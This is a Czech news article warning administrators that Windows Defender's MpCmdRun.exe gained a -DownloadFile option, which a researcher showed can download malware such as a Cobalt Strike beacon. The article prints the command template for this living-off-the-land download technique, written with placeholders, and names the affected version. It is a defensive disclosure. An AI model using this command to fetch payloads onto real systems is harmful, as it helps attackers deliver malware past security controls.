zprávy

Windows Defender se pro správce stává nebezpečnou aplikací

Windows Defender se pro správce stává nebezpečnou aplikací

Windows Defender ve Windows 10 je první obrannou linií v případě útoků malwaru a dělá také docela dobrou práci.

V jedné ze svých nových aktualizací však mocný antivirus získal nový příkaz DownloadFile, který umožňuje komukoli stáhnout libovolný soubor z adresy URL na určitou cestu v počítači.

Můžeme to nazvat zneužitím, protože by se dalo použít i ke stažení malwaru, což objevil bezpečnostní výzkumník Mohammad Askar, který svůj nález zveřejnil na Twitteru.

Jak lze program Windows Defender použít ke stahování malwaru?

Ke stažení libovolného souboru z externího zdroje do počítače je opravdu snadné použít nástroj Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe)..

MpCmdRun.exe -DownloadFile -url [url] -path [cesta_k_souboru_úlohy]

Při svém pokusu se Askaru podařilo pomocí tohoto příkazového řádku stáhnout maják Cobalt Strike, známý útočný nástroj..

Nový příkaz je obsažen ve verzi 4.18.2007.8-0 a vyšší, což poskytuje útočníkům docela dobrý začátek.

Tato funkce v zásadě přemění Windows Defender na LOLBIN (žijící mimo liniové binární soubory), neškodný systémový soubor, který lze použít ke škodlivým účelům..

Naštěstí po stažení škodlivého souboru bude detekován stejným programem Windows Defender nebo jiným antivirovým softwarem, pokud je přítomen.

Ze spolehlivého ochranného softwaru se Windows Defender stal další možnou hrozbou, kterou budou muset pozorně sledovat správci a bezpečnostní experti.

Pokud máte nějaké návrhy nebo komentáře, nechte je prosím níže v sekci Komentáře.

Společnost Microsoft odhaluje nezávislý samo vydavatelský program pro Xbox One „ID @ Xbox“
Microsoft chce udělat vše pro to, aby lépe propagoval nadcházející Xbox One. Za tímto účelem společnost Redmond oznámila, že umožní nezávislým (nezávi...
Jak aktualizovat z Windows 8.1 Preview na Windows 8.1
Aktualizace z Náhled verze Windows 8.1 na finální a oficiální Windows 8.1 je jiné, než když provádíte aktualizaci ze systému Windows 8, Windows 8 Pro ...
Kupte si Windows 8.1 za levnější cenu Nejlepší nabídky a slevy
Pokud chcete při nákupu systému Windows 8.1 ušetřit pár babek, níže si přečtěte některé levné způsoby, jak to udělat Windows 8.1 je venku a ti z vás,...